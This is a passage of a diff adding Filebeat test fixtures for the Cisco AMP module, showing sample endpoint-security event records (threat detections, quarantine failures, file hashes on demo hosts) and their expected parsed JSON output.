"host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56512, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532305", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 371000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 57830, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log new file mode 100644 index 00000000000..f31bf18a23a --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log @@ -0,0 +1,100 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine 